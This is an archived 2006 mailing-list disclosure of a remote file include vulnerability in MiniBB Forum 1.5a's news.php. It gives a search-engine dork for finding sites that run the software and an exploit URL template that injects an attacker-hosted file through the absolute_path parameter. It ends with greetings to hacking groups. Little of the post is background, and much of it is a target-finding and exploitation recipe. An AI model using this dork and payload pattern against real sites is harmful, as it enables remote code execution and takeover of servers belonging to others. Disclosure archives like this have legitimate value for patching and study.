MiniBB Forum <= 1.5a Remote File Include (news.php)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MiniBB Forum <= 1.5a Remote File Include (news.php)

Subject: MiniBB Forum <= 1.5a Remote File Include (news.php)
Date: Thu, 20 Jul 2006 15:44:10 +0000
From: "AG Spider" <suppressed>

Title : MiniBB Forum <= 1.5a Remote File Include (news.php)
###############################################################################

Discovered By AG-Spider

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 1.5a (news.php)version :  version [ 1.5 ]
exploit     :Remote File Include
-----------------------------------------------------------------------------

dork        : "Powered by miniBB 1.5 ©"
Exploit     :
http://[target]/news.php?absolute_path=[shellcode]?
----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx -  KaBaRa.HaCk .eGy]

done

_________________________________________________________________

Be the first to hear what's new at MSN - sign up to our free newsletters!http://www.msn.co.uk/newsletters

Prev by Date: Re: New PowerPoint Trojan installs itself as LSP
Next by Date: [MajorSecurity #23] BLOG:CMS <= 4.0.0j - XSS and cookie disclosure
Previous by thread: [Kurdish Security # 13] Savant2 Remote File Include Vulnerability [For Mambo, Joomla]
Next by thread: [MajorSecurity #23] BLOG:CMS <= 4.0.0j - XSS and cookie disclosure
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.